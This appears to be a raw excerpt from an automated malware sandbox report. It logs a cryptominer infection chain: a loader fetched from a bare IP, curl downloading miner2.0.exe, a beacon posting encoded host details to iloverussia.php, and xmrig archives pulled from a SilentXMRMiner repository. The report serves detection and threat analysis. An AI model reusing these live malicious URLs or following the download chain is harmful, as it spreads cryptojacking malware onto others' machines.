                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_00C2BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,6_2_00C2BD60
                        Source: global trafficHTTP traffic detected: GET /download/conf1.php HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
                        Source: global trafficHTTP traffic detected: GET /download/miner2.0.exe HTTP/1.1Host: eijfrhegrtbrfcd.onlineUser-Agent: curl/7.83.1Accept: */*
                        Source: global trafficHTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip HTTP/1.1Host: github.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /inc/loader_5879465914.exe HTTP/1.1Host: 185.215.113.16
                        Source: global trafficDNS traffic detected: DNS query: eijfrhegrtbrfcd.online
                        Source: global trafficDNS traffic detected: DNS query: sanctam.net
                        Source: global trafficDNS traffic detected: DNS query: github.com
                        Source: unknownHTTP traffic detected: POST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1Connection: Keep-AliveUser-Agent: A WinHTTP Example Program/1.0Content-Length: 0Host: eijfrhegrtbrfcd.online
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/15.113.16/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/15.113.16/System32
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/7737D9ECF5C72AA370644
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&7:
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php/dn
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php:7.
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php=
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpB7V
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpER
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpF6Z
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpM6
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpN7
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpWindows
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpb1a30a186ec2d30be6db0b5
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedA
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phper_5879465914.exe
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded&
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded3
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded4
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedJ
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodede
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedr
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpr7f
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Local
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ViewSizePreferences.SourceAumid2
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/W
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/Wiow
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exe%
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000AD9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/loader_5879465914.exeh
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ones
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/t
                        Source: axplong.exe, 00000006.00000002.3019920701.0000000000B19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/ysWOW64
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/Root.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003616000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003436000.00000004.00000800.00020000.00000000.sdmp, WR64.sys.139.drString found in binary or memory: http://crl.globalsign.net/primobject.crl0
                        Source: svchost64.exe, 0000008B.00000002.2788969573.000000000375D000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000357C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                        Source: svchost64.exe, 0000006B.00000002.2706597636.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.00000000035C1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 00000090.00000002.2783114203.0000000003221000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, sihost64.exe, 0000009F.00000002.2836528294.00000000032A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: sihost64.exe, 0000009F.00000002.2836528294.00000000032D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.
                        Source: loader_5879465914.exe, 00000007.00000003.2741556491.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2724634660.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2791232817.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2894492934.000000000378D000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2857988717.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2763069351.00000000037A6000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2908398363.0000000003788000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2949314469.0000000003797000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2867639993.000000000378E000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3022068193.0000000003799000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2590705590.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2742582676.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2864099579.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2832045972.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2399904766.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2879187208.000000000087A000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2510316366.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/
                        Source: loader_5879465914.exe, 00000007.00000003.2550392048.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000002.3020183902.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2438846550.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2467127699.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2426102539.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2793911920.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2635393911.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2766846263.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2373865784.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2481291707.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2620255870.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2453484354.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2508746813.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2673880736.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2399949653.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2522344856.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2689820350.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2358547789.0000000000777000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2386863025.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2648797169.0000000000778000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2412212318.0000000000778000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/0
                        Source: loader_5879465914.exe, 00000007.00000002.3021798885.0000000003750000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/A
                        Source: Microsoft-Edge.exe, 0000000E.00000002.3022066818.0000000003705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/R
                        Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.php
                        Source: curl.exe, 0000000A.00000002.2354249733.00000212B53B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpe
                        Source: curl.exe, 0000000A.00000002.2354315506.00000212B53EC000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2353963310.00000212B53EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/conf1.phpy
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exe
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exePz
                        Source: curl.exe, 00000052.00000003.2618490481.000001DFDEF7B000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000052.00000002.2619230837.000001DFDEF7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.exeX
                        Source: curl.exe, 00000052.00000002.2619013349.000001DFDEF54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/download/miner2.0.execk.dll
                        Source: Microsoft-Edge.exe, 0000000E.00000003.2439702684.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2455135298.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2636667274.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2550111525.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426774904.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000002.3020533522.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2412607559.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2497419323.00000000008CF000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2619479146.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2690557192.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2467067729.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2605563246.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2669985845.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2564142044.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2523814240.00000000008C0000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2426458006.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2577879379.0000000000914000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnk
                        Source: loader_5879465914.exe, 00000007.00000003.2632263244.000000000377B000.00000004.00000020.00020000.00000000.sdmp, loader_5879465914.exe, 00000007.00000003.2425064392.0000000000802000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481189507.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2496432695.0000000003743000.00000004.00000020.00020000.00000000.sdmp, Microsoft-Edge.exe, 0000000E.00000003.2481058326.0000000003743000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://eijfrhegrtbrfcd.online:443/iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003740000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com
                        Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resource
                        Source: svchost64.exe, 00000095.00000002.2847173181.0000000003561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip
                        Source: svchost64.exe, 0000008B.00000002.2788969573.0000000003780000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.000000000359F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/UnamSanctam/SilentXMRMiner/master/SilentXMRMiner/Resources/xmrig.z
                        Source: svchost64.exe, 0000008B.00000002.2788969573.00000000036ED000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 0000008B.00000002.2788969573.0000000003736000.00000004.00000800.00020000.00000000.sdmp, svchost64.exe, 00000095.00000002.2847173181.0000000003554000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sanctam.net:58899
                        Source: svchost64.exe, 00000095.00000002.2847173181.0000000003510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
